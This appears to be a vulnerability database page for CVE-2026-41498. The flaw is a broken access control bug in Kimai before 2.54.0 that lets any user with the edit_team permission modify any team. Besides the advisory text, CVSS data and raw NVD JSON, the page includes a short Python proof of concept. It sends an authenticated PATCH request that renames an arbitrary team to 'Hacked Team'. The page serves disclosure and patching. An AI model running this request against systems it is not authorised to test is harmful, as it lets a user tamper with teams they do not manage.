CVE-2026-41498

Description

Kimai is an open-source time tracking application. Prior to version 2.54.0, the Team API endpoints use #[IsGranted('edit_team')] instead of #[IsGranted('edit', 'team')], causing Symfony TeamVoter to abstain from voting. This removes entity-level ownership checks on team operations, allowing any user with the edit_team permission to modify any team, not just teams they are authorized to manage. This issue has been patched in version 2.54.0.

CVSS Details

CVSS Score

3.3

Severity

LOW

CVSS Vector

CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:U/C:L/I:L/A:N

Configurations (Affected Products)

No configuration data available.

Kimai < 2.54.0

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

# PoC for CVE-2026-41498
# Description: Exploits broken access control to modify arbitrary team data.
import requests

def exploit(target_url, team_id, attacker_token, new_team_name):
    headers = {
        "Authorization": f"Bearer {attacker_token}",
        "Content-Type": "application/ld+json"
    }
    # Target endpoint for a specific team
    url = f"{target_url}/api/teams/{team_id}"
    
    # Payload to update team details
    payload = {
        "name": new_team_name
    }
    
    try:
        # Sending PATCH request to modify the team
        response = requests.patch(url, json=payload, headers=headers)
        
        if response.status_code == 200:
            print(f"[+] Success: Team {team_id} renamed to '{new_team_name}'")
            print(f"[+] Response: {response.json()}")
        else:
            print(f"[-] Failed with status code {response.status_code}: {response.text}")
            
    except Exception as e:
        print(f"[-] Error: {str(e)}")

# Usage example
# exploit("http://localhost:8000", 5, "<valid_token_with_edit_team_perm>", "Hacked Team")

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-41498
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-41498
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-41498/
[4] VulDB https://vuldb.com/cve/CVE-2026-41498
[5] https://github.com/kimai/kimai/releases/tag/2.54.0
[6] https://github.com/kimai/kimai/security/advisories/GHSA-jv9x-w4gm-hwcm
[7] https://github.com/kimai/kimai/security/advisories/GHSA-jv9x-w4gm-hwcm

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-41498", "sourceIdentifier": "[email protected]", "published": "2026-05-08T04:16:14.617", "lastModified": "2026-05-08T22:16:30.103", "vulnStatus": "Undergoing Analysis", "cveTags": [], "descriptions": [{"lang": "en", "value": "Kimai is an open-source time tracking application. Prior to version 2.54.0, the Team API endpoints use #[IsGranted('edit_team')] instead of #[IsGranted('edit', 'team')], causing Symfony TeamVoter to abstain from voting. This removes entity-level ownership checks on team operations, allowing any user with the edit_team permission to modify any team, not just teams they are authorized to manage. This issue has been patched in version 2.54.0."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:U/C:L/I:L/A:N", "baseScore": 3.3, "baseSeverity": "LOW", "attackVector": "NETWORK", "attackComplexity": "HIGH", "privilegesRequired": "HIGH", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 0.7, "impactScore": 2.5}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-862"}]}], "references": [{"url": "https://github.com/kimai/kimai/releases/tag/2.54.0", "source": "[email protected]"}, {"url": "https://github.com/kimai/kimai/security/advisories/GHSA-jv9x-w4gm-hwcm", "source": "[email protected]"}, {"url": "https://github.com/kimai/kimai/security/advisories/GHSA-jv9x-w4gm-hwcm", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0"}]}}